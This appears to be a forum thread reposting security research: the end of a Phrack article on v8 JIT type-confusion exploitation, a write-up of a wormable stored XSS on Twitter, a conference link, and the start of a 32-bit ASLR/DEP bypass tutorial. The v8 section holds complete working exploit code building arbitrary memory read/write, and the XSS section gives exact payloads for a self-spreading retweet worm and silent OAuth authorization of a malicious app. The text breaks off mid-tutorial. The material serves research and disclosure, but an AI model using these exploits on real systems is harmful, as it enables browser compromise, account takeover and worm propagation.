        o.p0 = 0; o.p1 = 1; o.p2 = 2; o.p3 = 3; o.p4 = 4;
        o.p5 = 5; o.p6 = 6; o.p7 = 7; o.p8 = 8; o.p9 = 9;
    
        0x0000130c92483e89         0x0000130c92483bb1
        0x0000000c00000000         0x0000006500000000
        0x0000000000000000         0x0000000b00000000
        0x0000000100000000         0x0000000000000000
        0x0000000200000000         0x0000002000000000
        0x0000000300000000         0x0000000c00000000
        0x0000000400000000         0x0000000000000000
        0x0000000500000000         0x0000130ce98a4341
        0x0000000600000000  <-!->  0x0000000200000000
        0x0000000700000000         0x000004c000000000
        0x0000000800000000         0x0000130c924826f1
        0x0000000900000000         0x0000130c924826f1
        ...                        ...
    
    In this case the properties p6 and p2 overlap after the conversion to
    dictionary mode. Unfortunately, the layout of the NameDictionary will be
    different in every execution of the engine due to some process-wide
    randomness being used in the hashing mechanism. It is thus necessary to
    first find such a matching pair of properties at runtime. The following
    code can be used for that purpose.
    
        function find_matching_pair(o) {
            let a = o.inline;
            this.Object.create(o);
            let p0 = o.p0;
            let p1 = o.p1;
            ...;
            let pN = o.pN;
            return [p0, p1, ..., pN];
        }
    
    Afterwards, the returned array is searched for a match. In case the exploit
    gets unlucky and doesn't find a matching pair (because all properties are
    stored at the end of the NameDictionary's inline buffer by bad luck), it is
    able to detect that and can simply retry with a different number of
    properties or different property names.
    
    ----[ 4.1 - Constructing Type Confusions
    
    There is an important bit about v8 that wasn't discussed yet. Besides the
    location of property values, Maps also store type information for
    properties. Consider the following piece of code:
    
        let o = {}
        o.a = 1337;
        o.b = {x: 42};
    
    After executing it in v8, the Map of o will indicate that the property .a
    will always be a Smi while property .b will be an Object with a certain Map
    that will in turn have a property .x of type Smi. In that case, compiling a
    function such as
    
        function foo(o) {
            return o.b.x;
        }
    
    will result in a single Map check for o but no further Map check for the .b
    property since it is known that .b will always be an Object with a specific
    Map. If the type information for a property is ever invalidated by
    assigning a property value of a different type, a new Map is allocated and
    the type information for that property is widened to include both the
    previous and the new type.
    
    With that, it becomes possible to construct a powerful exploit primitive
    from the bug at hand: by finding a matching pair of properties JIT code can
    be compiled which assumes it will load property p1 of one type but in
    reality ends up loading property p2 of a different type. Due to the type
    information stored in the Map, the compiler will, however, omit type checks
    for the property value, thus yielding a kind of universal type confusion: a
    primitive that allows one to confuse an object of type X with an object of
    type Y where both X and Y, as well as the operation that will be performed
    on type X in the JIT code, can be arbitrarily chosen. This is,
    unsurprisingly, a very powerful primitive.
    
    Below is the scaffold code for crafting such a type confusion primitive
    from the bug at hand. Here p1 and p2 are the property names of the two
    properties that overlap after the property storage is converted to
    dictionary mode. As they are not known in advance, the exploit relies on
    eval to generate the correct code at runtime.
    
        eval(`
            function vuln(o) {
                // Force a CheckMaps node
                let a = o.inline;
                // Trigger unexpected transition of property storage
                this.Object.create(o);
                // Seemingly load .p1 but really load .p2
                let p = o.${p1};
                // Use p (known to be of type X but really is of type Y)
                // ...;
            }
        `);
    
        let arg = makeObj();
        arg[p1] = objX;
        arg[p2] = objY;
        vuln(arg);
    
    In the JIT compiled function, the compiler will then know that the local
    variable p will be of type X due to the Map of o and will thus omit type
    checks for it. However, due to the vulnerability, the runtime code will
    actually receive an object of type Y, causing a type confusion.
    
    ----[ 4.2 - Gaining Memory Read/Write
    
    From here, additional exploit primitives will now be constructed: first a
    primitive to leak the addresses of JavaScript objects, second a primitive
    to overwrite arbitrary fields in an object. The address leak is possible by
    confusing the two objects in a compiled piece of code which fetches the .x1
    property, an unboxed double, converts it to a v8 HeapNumber, and returns
    that to the caller. Due to the vulnerability, it will, however, actually
    load a pointer to an object and return that as a double.
    
        function vuln(o) {
            let a = o.inline;
            this.Object.create(o);
            return o.${p1}.x1;
        }
    
        let arg = makeObj();
        arg[p1] = {x1: 13.37};      // X, inline property is an unboxed double
        arg[p2] = {y1: obj};        // Y, inline property is a pointer
        vuln(arg);
    
    This code will result in the address of obj being returned to the caller
    as a double, such as 1.9381218278403e-310.
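
    To make use of the leak, that double has to be reinterpreted as a
    64-bit integer. A minimal sketch of the conversion, mirroring the
    helpers used by the full exploit in chapter 6 (the final `- 1n`
    removes the tag bit that v8 sets on HeapObject pointers):

```javascript
// Reinterpret the raw bits of a double as a 64-bit unsigned integer by
// aliasing a Float64Array and a BigUint64Array over the same buffer.
const f64 = new Float64Array(1);
const u64 = new BigUint64Array(f64.buffer);

function doubleToAddress(d) {
    f64[0] = d;            // store the double...
    return u64[0] - 1n;    // ...read back its bits, strip the tag bit
}
```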
    
    Next, the corruption. As is often the case, the "write" primitive is just
    the inversion of the "read" primitive. In this case, it suffices to write
    to a property that is expected to be an unboxed double, such as shown next.
    
        function vuln(o) {
            let a = o.inline;
            this.Object.create(o);
            let orig = o.${p1}.x2;
            o.${p1}.x2 = ${newValue};
            return orig;
        }
    
        let arg = makeObj();
        arg[p1] = {x1: 13.37, x2: 13.38};
        arg[p2] = {y1: obj};
        vuln(arg);
    
    This will "corrupt" property .y1 of the second object with a controlled
    double. However, to achieve something useful, the exploit would likely need
    to corrupt an internal field of an object, such as is done below for an
    ArrayBuffer. Note that the second primitive will read the old value of the
    property and return that to the caller. This makes it possible to:
    
        * immediately detect once the vulnerable code ran for the first time
          and corrupted the victim object
    
        * fully restore the corrupted object at a later point to guarantee
          clean process continuation.
    
    With those primitives at hand, gaining arbitrary memory read/write becomes
    as easy as
    
        0. Creating two ArrayBuffers, ab1 and ab2
    
        1. Leaking the address of ab2
    
        2. Corrupting the backingStore pointer of ab1 to point to ab2
    
    Yielding the following situation:
    
        +-----------------+           +-----------------+
        |  ArrayBuffer 1  |     +---->|  ArrayBuffer 2  |
        |                 |     |     |                 |
        |  map            |     |     |  map            |
        |  properties     |     |     |  properties     |
        |  elements       |     |     |  elements       |
        |  byteLength     |     |     |  byteLength     |
        |  backingStore --+-----+     |  backingStore   |
        |  flags          |           |  flags          |
        +-----------------+           +-----------------+
    
    Afterwards, arbitrary addresses can be accessed by overwriting the
    backingStore pointer of ab2 by writing into ab1 and subsequently reading
    from or writing to ab2.
    
    ----[ 4.3 - Reflections
    
    As was demonstrated, by abusing the type inference system in v8, an
    initially limited type confusion primitive can be extended to achieve
    confusion of arbitrary objects in JIT code. This primitive is powerful for
    several reasons:
    
        0. The fact that the user is able to create custom types, e.g. by
        adding properties to objects. This avoids the need to find a good type
        confusion candidate as one can likely just create it, such as was done
        by the presented exploit when it confused an ArrayBuffer with an object
        with inline properties to corrupt the backingStore pointer.
    
        1. The fact that code can be JIT compiled that performs an arbitrary
        operation on an object of type X but at runtime receives an object of
        type Y due to the vulnerability. The presented exploit compiled loads
        and stores of unboxed double properties to achieve address leaks and
        the corruption of ArrayBuffers respectively.
    
        2. The fact that type information is aggressively tracked by the
        engines, increasing the number of types that can be confused with each
        other.
    
    As such, it can be desirable to first construct the discussed primitive
    from lower-level primitives if these aren't sufficient to achieve reliable
    memory read/write. It is likely that most type check elimination bugs can
    be turned into this primitive. Further, other types of vulnerabilities can
    potentially be exploited to yield it as well. Possible examples include
    register allocation bugs, use-after-frees, or out-of-bounds reads or
    writes into the property buffers of JavaScript objects.
    
    ----[ 4.4 Gaining Code Execution
    
    While previously an attacker could simply write shellcode into the JIT region
    and execute it, things have become slightly more involved: in early 2018,
    v8 introduced a feature called write-protect-code-memory [20] which essentially
    flips the JIT region's access permissions between R-X and RW-. With that, the
    JIT region will be mapped as R-X during execution of JavaScript code, thus
    preventing an attacker from directly writing into it. As such, one now needs
    to find another way to code execution, such as simply performing ROP by
    overwriting vtables, JIT function pointers, the stack, or through another
    method of one's choosing. This is left as an exercise for the reader.
    
    Afterwards, the only thing left to do is to run a sandbox escape... ;)
    
    
    --[ 5 - References
    
    [1] https://blogs.securiteam.com/index.php/archives/3783
    [2] https://cs.chromium.org/
    [3] https://v8.dev/
    [4] https://www.ecma-international.org/ecma-262/8.0/
    index.html#sec-array-exotic-objects
    [5] https://www.ecma-international.org/ecma-262/8.0/
    index.html#sec-addition-operator-plus
    [6] https://chromium.googlesource.com/v8/v8.git/+/6.9.427.19/
    tools/turbolizer/
    [7] https://v8.dev/docs/ignition
    [8] https://www.mgaudet.ca/technical/2018/6/5/
    an-inline-cache-isnt-just-a-cache
    [9] https://mathiasbynens.be/notes/shapes-ics
    [10] https://bugs.chromium.org/p/project-zero/issues/detail?id=1380
    [11] https://github.com/WebKit/webkit/commit/
    61dbb71d92f6a9e5a72c5f784eb5ed11495b3ff7
    [12] https://bugzilla.mozilla.org/show_bug.cgi?id=1145255
    [13] https://www.thezdi.com/blog/2017/8/24/
    deconstructing-a-winning-webkit-pwn2own-entry
    [14] https://bugs.chromium.org/p/chromium/issues/detail?id=762874
    [15] https://bugs.chromium.org/p/project-zero/issues/detail?id=1390
    [16] https://cloudblogs.microsoft.com/microsoftsecure/2017/10/18/
    browser-security-beyond-sandboxing/
    [17] https://bugs.chromium.org/p/project-zero/issues/detail?id=1396
    [18] https://www.mozilla.org/en-US/security/advisories/
    mfsa2018-24/#CVE-2018-12386
    [19] https://mathiasbynens.be/notes/prototypes
    [20] https://github.com/v8/v8/commit/
    14917b6531596d33590edb109ec14f6ca9b95536
    
    
    --[ 6 - Exploit Code
    
    if (typeof(window) !== 'undefined') {
        print = function(msg) {
            console.log(msg);
            document.body.textContent += msg + "\r\n";
        }
    }
    
    {
        // Conversion buffers.
        let floatView = new Float64Array(1);
        let uint64View = new BigUint64Array(floatView.buffer);
        let uint8View = new Uint8Array(floatView.buffer);
    
        // Feature request: unboxed BigInt properties so these aren't needed =)
        Number.prototype.toBigInt = function toBigInt() {
            floatView[0] = this;
            return uint64View[0];
        };
    
        BigInt.prototype.toNumber = function toNumber() {
            uint64View[0] = this;
            return floatView[0];
        };
    }
    
    // Garbage collection is required to move objects to a stable position in
    // memory (OldSpace) before leaking their addresses.
    function gc() {
        for (let i = 0; i < 100; i++) {
            new ArrayBuffer(0x100000);
        }
    }
    
    const NUM_PROPERTIES = 32;
    const MAX_ITERATIONS = 100000;
    
    function checkVuln() {
        function hax(o) {
            // Force a CheckMaps node before the property access. This must
            // load an inline property here so the out-of-line properties
            // pointer cannot be reused later.
            o.inline;
    
            // Turbofan assumes that the JSCreateObject operation is
            // side-effect free (it has the kNoWrite property). However, if the
            // prototype object (o in this case) is not a constant, then
            // JSCreateObject will be lowered to a runtime call to
            // CreateObjectWithoutProperties. This in turn eventually calls
            // JSObject::OptimizeAsPrototype which will modify the prototype
            // object and assign it a new Map. In particular, it will
            // transition the OOL property storage to dictionary mode.
            Object.create(o);
    
            // The CheckMaps node for this property access will be incorrectly
            // removed. The JIT code is now accessing a NameDictionary but
            // believes its loading from a FixedArray.
            return o.outOfLine;
        }
    
        for (let i = 0; i < MAX_ITERATIONS; i++) {
            let o = {inline: 0x1337};
            o.outOfLine = 0x1338;
            let r = hax(o);
            if (r !== 0x1338) {
                return;
            }
        }
    
        throw "Not vulnerable";
    }
    
    // Make an object with one inline and numerous out-of-line properties.
    function makeObj(propertyValues) {
        let o = {inline: 0x1337};
        for (let i = 0; i < NUM_PROPERTIES; i++) {
            Object.defineProperty(o, 'p' + i, {
                writable: true,
                value: propertyValues[i]
            });
        }
        return o;
    }
    
    //
    // The 3 exploit primitives.
    //
    
    // Find a pair (p1, p2) of properties such that p1 is stored at the same
    // offset in the FixedArray as p2 is in the NameDictionary.
    let p1, p2;
    function findOverlappingProperties() {
        let propertyNames = [];
        for (let i = 0; i < NUM_PROPERTIES; i++) {
            propertyNames[i] = 'p' + i;
        }
        eval(`
            function hax(o) {
                o.inline;
                this.Object.create(o);
                ${propertyNames.map((p) => `let ${p} = o.${p};`).join('\n')}
                return [${propertyNames.join(', ')}];
            }
        `);
    
        let propertyValues = [];
        for (let i = 1; i < NUM_PROPERTIES; i++) {
            // There are some unrelated, small-valued SMIs in the dictionary.
            // However they are all positive, so use negative SMIs. Don't use
            // -0 though, that would be represented as a double...
            propertyValues[i] = -i;
        }
    
        for (let i = 0; i < MAX_ITERATIONS; i++) {
            let r = hax(makeObj(propertyValues));
            for (let i = 1; i < r.length; i++) {
                // Properties that overlap with themselves cannot be used.
                if (i !== -r[i] && r[i] < 0 && r[i] > -NUM_PROPERTIES) {
                    [p1, p2] = [i, -r[i]];
                    return;
                }
            }
        }
    
        throw "Failed to find overlapping properties";
    }
    
    // Return the address of the given object as BigInt.
    function addrof(obj) {
        // Confuse an object with an unboxed double property with an object
        // with a pointer property.
        eval(`
            function hax(o) {
                o.inline;
                this.Object.create(o);
                return o.p${p1}.x1;
            }
        `);
    
        let propertyValues = [];
        // Property p1 should have the same Map as the one used in
        // corrupt for simplicity.
        propertyValues[p1] = {x1: 13.37, x2: 13.38};
        propertyValues[p2] = {y1: obj};
    
        for (let i = 0; i < MAX_ITERATIONS; i++) {
            let res = hax(makeObj(propertyValues));
            if (res !== 13.37) {
                // Adjust for the LSB being set due to pointer tagging.
                return res.toBigInt() - 1n;
            }
        }
    
        throw "Addrof failed";
    }
    
    // Corrupt the backingStore pointer of an ArrayBuffer object and return the
    // original address so the ArrayBuffer can later be repaired.
    function corrupt(victim, newValue) {
        eval(`
            function hax(o) {
                o.inline;
                this.Object.create(o);
                let orig = o.p${p1}.x2;
                o.p${p1}.x2 = ${newValue.toNumber()};
                return orig;
            }
        `);
    
        let propertyValues = [];
        // x2 overlaps with the backingStore pointer of the ArrayBuffer.
        let o = {x1: 13.37, x2: 13.38};
        propertyValues[p1] = o;
        propertyValues[p2] = victim;
    
        for (let i = 0; i < MAX_ITERATIONS; i++) {
            o.x2 = 13.38;
            let r = hax(makeObj(propertyValues));
            if (r !== 13.38) {
                return r.toBigInt();
            }
        }
    
        throw "CorruptArrayBuffer failed";
    }
    
    function pwn() {
        //
        // Step 0: verify that the engine is vulnerable.
        //
        checkVuln();
        print("[+] v8 version is vulnerable");
    
        //
        // Step 1. determine a pair of overlapping properties.
        //
        findOverlappingProperties();
        print(`[+] Properties p${p1} and p${p2} overlap`);
    
        //
        // Step 2. leak the address of an ArrayBuffer.
        //
        let memViewBuf = new ArrayBuffer(1024);
        let driverBuf = new ArrayBuffer(1024);
    
        // Move ArrayBuffer into old space before leaking its address.
        gc();
    
        let memViewBufAddr = addrof(memViewBuf);
        print(`[+] ArrayBuffer @ 0x${memViewBufAddr.toString(16)}`);
    
        //
        // Step 3. corrupt the backingStore pointer of another ArrayBuffer to
        // point to the first ArrayBuffer.
        //
        let origDriverBackingStorage = corrupt(driverBuf, memViewBufAddr);
    
        let driver = new BigUint64Array(driverBuf);
        let origMemViewBackingStorage = driver[4];
    
        //
        // Step 4. construct the memory read/write primitives.
        //
        let memory = {
            write(addr, bytes) {
                driver[4] = addr;
                let memview = new Uint8Array(memViewBuf);
                memview.set(bytes);
            },
            read(addr, len) {
                driver[4] = addr;
                let memview = new Uint8Array(memViewBuf);
                return memview.subarray(0, len);
            },
            read64(addr) {
                driver[4] = addr;
                let memview = new BigUint64Array(memViewBuf);
                return memview[0];
            },
            write64(addr, ptr) {
                driver[4] = addr;
                let memview = new BigUint64Array(memViewBuf);
                memview[0] = ptr;
            },
            addrof(obj) {
                memViewBuf.leakMe = obj;
                let props = this.read64(memViewBufAddr + 8n);
                return this.read64(props + 15n) - 1n;
            },
            fixup() {
                let driverBufAddr = this.addrof(driverBuf);
                this.write64(driverBufAddr + 32n, origDriverBackingStorage);
                this.write64(memViewBufAddr + 32n, origMemViewBackingStorage);
            },
        };
    
        print("[+] Constructed memory read/write primitive");
    
        // Read from and write to arbitrary addresses now :)
        memory.write64(0x41414141n, 0x42424242n);
    
        // All done here, repair the corrupted objects.
        memory.fixup();
    
        // Verify everything is stable.
        gc();
    }
    
    if (typeof(window) === 'undefined')
        pwn();
    
    --[ EOF
    

     

    Sursa: http://phrack.org/papers/jit_exploitation.html

  4. Tale of a Wormable Twitter XSS


    In mid-2018, I found a stored XSS on Twitter in the least likely place you could think of. Yes, right in the tweet! But what makes this XSS so special is that it had the potential to be turned into a fully-fledged XSS worm. If the concept of XSS worms is new to you, you might want to read more about it on Wikipedia.

    Let me jump right to the full exploit and then we can explain the magic later on. Before this got fixed, tweeting the following URL would have created an XSS worm that spreads from account to account throughout the Twitterverse:

    https://twitter.com/messages/compose?recipient_id=988260476659404801&welcome_message_id=988274596427304964&text=%3C%3Cx%3E/script%3E%3C%3Cx%3Eiframe%20id%3D__twttr%20src%3D/intent/retweet%3Ftweet_id%3D1114986988128624640%3E%3C%3Cx%3E/iframe%3E%3C%3Cx%3Escript%20src%3D//syndication.twimg.com/timeline/profile%3Fcallback%3D__twttr/alert%3Buser_id%3D12%3E%3C%3Cx%3E/script%3E%3C%3Cx%3Escript%20src%3D//syndication.twimg.com/timeline/profile%3Fcallback%3D__twttr/frames%5B0%5D.retweet_btn_form.submit%3Buser_id%3D12%3E

    “How so? It’s just a link!”, you might wonder. But this, my friend, is no ordinary link. It’s a Welcome Message deeplink [1]. The deeplink gets rendered as a Twitter card:

     


     

    This Twitter card is actually an iframe element which points to “https://twitter.com/i/cards/tfw/v1/1114991578353930240”. The iframe is obviously same-origin and not sandboxed (which means we have DOM access to the parent webpage). The payload in the “text” parameter would then get reflected back in an inline JSON object as the value of the “default_composer_text” key:

    <script type="text/twitter-cards-serialization">
      {
        "strings": { },
        "card": {
      "viewer_id" : "988260476659404801",
      "is_caps_enabled" : true,
      "forward" : "false",
      "is_logged_in" : true,
      "is_author" : true,
      "language" : "en",
      "card_name" : "2586390716:message_me",
      "welcome_message_id" : "988274596427304964",
      "token" : "[redacted]",
      "is_emojify_enabled" : true,
      "scribe_context" : "%7B%7D",
      "is_static_view" : false,
      "default_composer_text" : "</script><iframe id=__twttr src=/intent/retweet?tweet_id=1114986988128624640></iframe><script src=//syndication.twimg.com/timeline/profile?callback=__twttr/alert;user_id=12></script><script src=//syndication.twimg.com/timeline/profile?callback=__twttr/frames[0].retweet_btn_form.submit;user_id=12>\\u00A0",
      "recipient_id" : "988260476659404801",
      "card_uri" : "https://t.co/1vVzoyquhh",
      "render_card" : true,
      "tweet_id" : "1114991578353930240",
      "card_url" : "https://t.co/1vVzoyquhh"
    },
        "twitter_cldr": false,
        "scribeData": {
          "card_name": "2586390716:message_me",
          "card_url": "https://t.co/1vVzoyquhh"
        }
      }
    </script>
    

    Note: Once the HTML parser encounters a closing `</script>` tag anywhere after the initial opening `<script>` tag, the script element is terminated immediately, even when the encountered `</script>` appears inside a string literal, a comment, or a regex.
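This termination rule is easy to reproduce. As an illustration (ours, not from the original write-up), Python's standard-library HTML parser follows the same tokenizer rule: the script element's content ends at the first `</script>`, even when that tag sits inside a JavaScript string literal:

```python
# Illustration: the <script> element ends at the FIRST "</script>",
# even though that tag appears inside a JavaScript string literal.
from html.parser import HTMLParser

class ScriptWatcher(HTMLParser):
    def __init__(self):
        super().__init__()
        self.in_script = False
        self.script_text = ""

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False

    def handle_data(self, data):
        # Only collect the data that the parser considers script content.
        if self.in_script:
            self.script_text += data

page = '<script>var s = "</script><svg onload=alert()>";</script>'
w = ScriptWatcher()
w.feed(page)
print(repr(w.script_text))  # → 'var s = "' -- the string literal did not help
```

The collected script body stops right before the first `</script>`; everything after it, including the injected `<svg>` tag, is parsed as regular markup.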

    But before you could get to this point, you’d have had to overcome many limitations and obstacles first:

    • Both single and double quotes get escaped to `\'` and `\"`, respectively.
    • HTML tags get stripped (so `a</script>b` would become `ab`).
    • The payload gets truncated at around 300 characters.
    • There is a CSP policy in place which disallows non-whitelisted inline scripts.

    At first glance, these might look like proper countermeasures. But the moment I noticed the HTML-tag stripping behavior, my spidey sense started tingling. That’s because this is usually error-prone. Unlike escaping individual characters, stripping tags requires HTML parsing (and parsing is always hard to get right, regexes anybody?).

    So I started fiddling with a very basic payload `</script><svg onload=alert()>` and kept fiddling until I ended up with `<</<x>/script/test000><</<x>svg onload=alert()></><script>1<\x>2`, which got turned into `</script/test000><svg onload=alert()>`. Jackpot! I immediately reported my finding to the Twitter security team at that point and didn't wait until I found a bypass for the CSP policy.

    Now, let’s take a closer look at Twitter’s CSP policy:

    script-src 'nonce-ETj41imzIQ/aBrjFcbynCg==' https://twitter.com https://*.twimg.com https://ton.twitter.com 'self'; frame-ancestors https://ms2.twitter.com https://twitter.com http://localhost:8889 https://momentmaker-local.twitter.com https://localhost.twitter.com https://tdapi-staging.smf1.twitter.com https://ms5.twitter.com https://momentmaker.twitter.com https://tweetdeck.localhost.twitter.com https://ms3.twitter.com https://tweetdeck.twitter.com https://wfa.twitter.com https://mobile.twitter.com https://ms1.twitter.com 'self' https://ms4.twitter.com; font-src https://twitter.com https://*.twimg.com data: https://ton.twitter.com 'self'; media-src https://twitter.com https://*.twimg.com https://ton.twitter.com blob: 'self'; connect-src https://caps.twitter.com https://cards.twitter.com https://cards-staging.twitter.com https://upload.twitter.com blob: 'self'; style-src https://twitter.com https://*.twimg.com https://ton.twitter.com 'unsafe-inline' 'self'; object-src 'none'; default-src 'self'; frame-src https://twitter.com https://*.twimg.com https://* https://ton.twitter.com 'self'; img-src https://twitter.com https://*.twimg.com data: https://ton.twitter.com blob: 'self'; report-uri https://twitter.com/i/csp_report?a=NVQWGYLXMNQXEZDT&ro=false;

    An interesting fact is, Twitter doesn’t deploy one global CSP policy throughout the entire app. Instead, different parts of the app have different CSP policies. This is the CSP policy for Twitter cards, and we are only interested in the `script-src` directive for now.

    To the trained eye, the wildcard origin “https://*.twimg.com” looks too permissive and is most likely to be the vulnerable point. So it wasn’t very hard to find a JSONP endpoint on a subdomain of “twimg.com”: https://syndication.twimg.com/timeline/profile?callback=__twttr;user_id=12

    The hard part was bypassing the callback validation. You can't simply specify any callback you like; it must start with the `__twttr` prefix (otherwise, the callback is rejected). This means you can't pass built-in functions like `alert`, for instance (but you could use `__twttralert`, which of course evaluates to `undefined`). I then did a few checks to see which characters are filtered for the callback and which are allowed, and oddly enough, forward slashes were allowed in the "callback" parameter (i.e., "?callback=__twttr/alert"). This would then result in the following response:

    /**/__twttr/alert({"headers":{"status":200,"maxPosition":"1113300837160222720","minPosition":"1098761257606307840","xPolling":30,"time":1554668056},"body":"[...]"});

    So now we just need to figure out a way to define a `__twttr` reference on the `window` object so we don’t get a `ReferenceError` exception. There are two ways I could think of to do just that:

    1. Find a whitelisted script that defines a `__twttr` variable and include it in the payload.

    2. Set the ID attribute of an HTML element to `__twttr` (which would create a global reference to that element on the `window` object [2]).

    So I went with option #2, and that’s why the iframe element in the payload has an ID attribute despite the fact that we want the payload to be as short as possible.

    So far, so good. But since we can’t inject arbitrary characters in the callback parameter, this means we are quite limited in what JavaScript syntax we can use (note: the semicolon in “?callback=__twttr/alert;user_id=12” is not part of the callback parameter, it’s actually a URL query separator—the same as “&”). But this is not really much of a problem, as we still can invoke any function we want (similar to a SOME attack [3]).

    To sum up what the full payload does:

    1. Create an iframe element with the ID “__twttr” which points to a specific tweet using Twitter Web Intents (https://twitter.com/intent/retweet?tweet_id=1114986988128624640).
    2. Use the CSP policy bypass to invoke a synchronous function (i.e., `alert`) to delay the execution of the next script block until the iframe has fully loaded (the alert is not for show—because of syntax limitations, we cannot simply use `setTimeout(func)`).
    3. Use the CSP bypass again to submit a form inside the iframe which causes a specific tweet to get retweeted.

    An XSS worm would ideally spread by retweeting itself. And if there were no syntax limitations, we could have so easily done that. But now that we have to depend on Twitter Web Intents for retweets, we need to know the exact tweet ID and specify that in the payload before actually tweeting it. Quite the dilemma, as tweet IDs are not actually sequential [4] (meaning it won’t be easy to predict the tweet ID beforehand). Oh no, our evil plan is doomed again!

    Well, not really. There are two other relatively easier ways in which we can make the XSS worm spread:

    1. Weaponize a chain of tweets where each tweet in the chain contains a payload that retweets the one preceding it. This way, if you get in contact with any of those tweets, this would initiate a series of retweets which would eventually deliver the first tweet in the chain to every active Twitter account.

    2. Simply promote the tweet that carries the XSS payload so it would have much greater reach.

    Or you could use a mix of those two spreading mechanisms for better results. The possibilities are endless. Also luckily for us, when the “https://twitter.com/intent/retweet?tweet_id=1114986988128624640” page is loaded for an already-retweeted tweet, the `frames[0].retweet_btn_form.submit` method in the payload would then correspond to a follow action instead of a retweet upon invocation.

    This means that the first time a weaponized tweet is loaded on your timeline, it’ll immediately get retweeted on your Twitter profile. But the next time you view this tweet again, it will make you follow the attacker’s account!

    Taking exploitation a step further:

    Making an XSS worm sure can be fun and amusing, but is that really as far as this can go? In case it wasn’t scary enough for you, this XSS could have also been exploited to force Twitter users into authorizing a malicious third-party app to access their accounts silently and with full permissions via the Twitter “oauth/authorize” API [5].

    This could be achieved by loading “https://twitter.com/oauth/authorize?oauth_token=[token]” in an iframe and then automatically submitting the authorization form included within that page (i.e., the form with the ID `oauth_form`). A silent exploit with staged payloads would go as following:

    1. Post a tweet with the following as a payload and obtain its ID:

    </script><iframe src=/oauth/authorize?oauth_token=cXDzjwAAAAAA4_EbAAABaizuCOk></iframe>

    2. Post another tweet with the following as a payload and obtain its ID:

    </script><script id=__twttr src=//syndication.twimg.com/tweets.json?callback=__twttr/parent.frames[0].oauth_form.submit;ids=20></script>

    3. Post a third tweet with the following as a payload (which combines the two tweets together in one page):

    </script><iframe src=/i/cards/tfw/v1/1118608452136460288></iframe><iframe src=/i/cards/tfw/v1/1118609496560029696></iframe>

    Now as soon as the third tweet gets loaded on a user’s timeline, a malicious third-party app would have full access to their account. The only caveat here is that the “oauth_token” value is valid for one use only and has a relatively short expiry time. But this is not much of a problem either as an attacker could post as many tweets as needed to compromise any number of accounts.

    The bottom line is, I could have forced you to load any page on Twitter, click any button, submit any form, and what not!

    P.S. If you want to get in touch, you can find me on Twitter/GitHub. Also don’t forget to follow our official Twitter account!

    Disclosure Timeline:

    • 23rd April 2018 – I filed the initial bug report.
    • 25th April 2018 – The report got triaged.
    • 27th April 2018 – Twitter awarded a $2,940 bounty.
    • 4th May 2018 – A fix was rolled out.
    • 7th April 2019 – I provided more information on the CSP bypass.
    • 12th April 2019 – I sent a draft of this write-up directly to a Twitter engineer for comment.
    • 12th April 2019 – I was asked to delay publication until after the CSP bypass is fixed.
    • 22nd April 2019 – The CSP bypass got fixed and we got permission to publish.
    • 2nd May 2019 – The write-up was published publicly.

     

    References:

    [1] https://developer.twitter.com/en/docs/direct-messages/welcome-messages/guides/deeplinking-to-welcome-message.html

    [2] https://html.spec.whatwg.org/#named-access-on-the-window-object

    [3] http://www.benhayak.com/2015/06/same-origin-method-execution-some.html

    [4] https://developer.twitter.com/en/docs/basics/twitter-ids.html

    [5] https://developer.twitter.com/en/docs/basics/authentication/api-reference/authorize.html

     
  5. Main Conference - Day 1

     

     

    Sursa: https://troopers.de/troopers19/agenda/#agenda-day--2019-03-20

  6.  

    This post covers the basics of bypassing ASLR and DEP with r2. For this, a vulnerable application, yolo.c, is required:

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    
    void lol(char *b)
    {
        char buffer[1337];
        strcpy(buffer, b);
    }
    
    int main(int argc, char **argv)
    {
        lol(argv[1]);
    }
    

    64-Bit vs 32-Bit Binaries

    The issue here should be quite obvious: strcpy blindly copies the user-controlled input buffer `b` into `buffer`, which causes a buffer overflow. Since ASLR and DEP are normally enabled, the following things don't just work out of the box:

    • Providing shellcode via user input: DEP prevents executing this code and the application would just crash
    • Using a library like libc and spawning a shell (e.g. using ret2libc) because the start address of the library is randomized after each start of a process:
    $ gcc yolo.c -o yolo_x64
    
    $ ldd yolo_x64 | grep libc
            libc.so.6 => /usr/lib/libc.so.6 (0x00007fe0def68000)
    
    $ ldd yolo_x64 | grep libc
            libc.so.6 => /usr/lib/libc.so.6 (0x00007fba1f038000) <-- much random
    
    $ ldd yolo_x64 | grep libc
            libc.so.6 => /usr/lib/libc.so.6 (0x00007f3d65b03000) <-- also here
    
    $ ldd yolo_x64 | grep libc
            libc.so.6 => /usr/lib/libc.so.6 (0x00007f584e180000) <-- here too
    
    $ ldd yolo_x64 | grep libc
            libc.so.6 => /usr/lib/libc.so.6 (0x00007fc4aee7c000) <-- :/
    

    As seen above, the start address of libc takes a different random value on every run. The ret2libc technique would theoretically work if an attacker is able to guess the start address of libc. However, for 64-bit binaries the chance of guessing correctly is far too small. Because of this, this post covers 32-bit binaries, where the odds of a correct guess are much better:

    $ gcc -fno-stack-protector -m32 yolo.c -o yolo
    
    $ ldd yolo | grep libc
            libc.so.6 => /usr/lib32/libc.so.6 (0xf7cbb000)
    
    $ ldd yolo | grep libc
            libc.so.6 => /usr/lib32/libc.so.6 (0xf7d43000) <-- not so random
    
    $ ldd yolo | grep libc
            libc.so.6 => /usr/lib32/libc.so.6 (0xf7d18000)
    
    $ ldd yolo | grep libc
            libc.so.6 => /usr/lib32/libc.so.6 (0xf7d7d000)
    
    $ ldd yolo | grep libc
            libc.so.6 => /usr/lib32/libc.so.6 (0xf7cb0000)
    

    The approach to guess the right start address is also called brute forcing ASLR. As indicated above, the address space for possible start addresses of the library is not that large anymore for a 32-bit binary:

    $ ldd yolo | grep libc
            libc.so.6 => /usr/lib32/libc.so.6 (0xf7d8d000)
    
    
    $ while true; do echo -ne "."; ldd yolo | grep libc | grep 0xf7d8d000; done
    
    ...................................     libc.so.6 => /usr/lib32/libc.so.6 (0xf7d8d000)
    ..................................................................................................................................................................................................................................................................................................................................................     libc.so.6 => /usr/lib32/libc.so.6 (0xf7d8d000)
    ............................................................................................................... libc.so.6 => /usr/lib32/libc.so.6 (0xf7d8d000)
    

    The same libc start address was found after multiple re-executions. Therefore the value can be guessed by re-using a previously valid start address.
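As a back-of-the-envelope sketch (our assumption, not a measurement from the post): if the 32-bit libc base can take one of N equally likely values, re-using a fixed previously seen address is a geometric trial, so on average N attempts are needed before the guess matches:

```python
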